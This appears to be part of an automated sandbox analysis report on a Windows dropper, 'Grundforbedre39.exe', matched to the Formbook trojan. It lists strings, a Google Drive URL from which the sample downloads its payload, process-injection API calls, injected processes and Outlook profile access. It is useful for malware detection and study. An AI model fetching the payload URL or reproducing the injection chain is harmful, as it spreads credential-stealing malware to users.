        Source: Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: Grundforbedre39.exe, 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Grundforbedre39.exe, 00000000.00000000.792517395.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Grundforbedre39.exe, 00000004.00000000.1037768480.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: Grundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: Grundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/U
        Source: Grundforbedre39.exe, 00000004.00000002.1277691760.00000000348B0000.00000004.00001000.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000002.1264916948.0000000005231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0
        Source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162332275.000000000523F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0&export=download
        Source: Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0&export=downloade.
        Source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknown HTTPS traffic detected: 142.251.41.14:443 -> 192.168.11.20:49757 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 142.250.65.161:443 -> 192.168.11.20:49758 version: TLS 1.2
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_004052B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052B8

        E-Banking Fraud

        Source: Yara matchFile source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355534E0 NtCreateMutant,LdrInitializeThunk,4_2_355534E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_35552D10
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_35552B90
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35554570 NtSuspendThread,4_2_35554570
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35554260 NtSetContextThread,4_2_35554260
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552D50 NtWriteVirtualMemory,4_2_35552D50
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552DC0 NtAdjustPrivilegesToken,4_2_35552DC0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552DA0 NtReadVirtualMemory,4_2_35552DA0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552C50 NtUnmapViewOfSection,4_2_35552C50
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552C10 NtOpenProcess,4_2_35552C10
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35553C30 NtOpenProcessToken,4_2_35553C30
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552C30 NtMapViewOfSection,4_2_35552C30
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552C20 NtSetInformationFile,4_2_35552C20
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552CD0 NtEnumerateKey,4_2_35552CD0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552CF0 NtDelayExecution,4_2_35552CF0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35553C90 NtOpenThread,4_2_35553C90
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552F00 NtCreateFile,4_2_35552F00
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552F30 NtOpenDirectoryObject,4_2_35552F30
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552FB0 NtSetValueKey,4_2_35552FB0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552E50 NtCreateSection,4_2_35552E50
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552E00 NtQueueApcThread,4_2_35552E00
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552ED0 NtResumeThread,4_2_35552ED0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552EC0 NtQuerySection,4_2_35552EC0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_0040326A EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040326A
        Source: C:\Users\user\Desktop\Grundforbedre39.exe Code function: String function: 3550B910 appears 79 times
        Source: C:\Users\user\Desktop\Grundforbedre39.exe Code function: String function: 35567BE4 appears 60 times
        Source: C:\Users\user\Desktop\Grundforbedre39.exe Code function: String function: 3559EF10 appears 59 times
        Source: C:\Users\user\Desktop\Grundforbedre39.exe Code function: String function: 3558E692 appears 65 times
        Source: Grundforbedre39.exe Static PE information: invalid certificate
        Source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenetiougc.exej% vs Grundforbedre39.exe
        Source: C:\Users\user\Desktop\Grundforbedre39.exe Section loaded (in load order): edgegdi.dll, uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, textshaping.dll, profapi.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, edgegdi.dll, umpdc.dll, wininet.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeSection loaded: rasadhlp.dllJump to behavior
        Source: Grundforbedre39.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/10@60/12
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_0040326A EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040326A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_00404579 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,0_2_00404579
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_00402095
        Source: C:\Users\user\Desktop\Grundforbedre39.exeFile created: C:\Users\user\Pictures\industrialisereJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeFile created: C:\Users\user\AppData\Local\Temp\nsrA1F1.tmpJump to behavior
        Source: Grundforbedre39.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Grundforbedre39.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Grundforbedre39.exeReversingLabs: Detection: 23%
        Source: C:\Users\user\Desktop\Grundforbedre39.exeFile read: C:\Users\user\Desktop\Grundforbedre39.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Grundforbedre39.exe C:\Users\user\Desktop\Grundforbedre39.exe
        Source: C:\Users\user\Desktop\Grundforbedre39.exeProcess created: C:\Users\user\Desktop\Grundforbedre39.exe C:\Users\user\Desktop\Grundforbedre39.exe
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeProcess created: C:\Windows\SysWOW64\netiougc.exe C:\Windows\SysWOW64\netiougc.exe
        Source: C:\Windows\SysWOW64\netiougc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\Grundforbedre39.exeProcess created: C:\Users\user\Desktop\Grundforbedre39.exe C:\Users\user\Desktop\Grundforbedre39.exeJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeProcess created: C:\Windows\SysWOW64\netiougc.exe C:\Windows\SysWOW64\netiougc.exeJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Grundforbedre39.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: netiougc.pdbGCTL source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe, 00000009.00000002.5890904969.0000000000A5E000.00000002.00000001.01000000.00000008.sdmp
        Source: Binary string: wntdll.pdbUGP source: Grundforbedre39.exe, 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Grundforbedre39.exe, Grundforbedre39.exe, 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: netiougc.pdb source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara matchFile source: 00000000.00000002.1134826419.000000000785E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D47CDA pushad ; retf 9_2_04D47CDB
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D53C09 pushfd ; ret 9_2_04D53C18
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D58D72 push edx; iretd 9_2_04D58D79
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D42D7D push ecx; retf 9_2_04D42D7E
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D3B6EF push ebp; iretd 9_2_04D3B705
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D63696 push eax; ret 9_2_04D63698
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D59641 push eax; ret 9_2_04D59645
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D3B70D push ebp; iretd 9_2_04D3B705
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D388F8 push eax; ret 9_2_04D38900
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D4D0A7 push edi; iretd 9_2_04D4D0B0
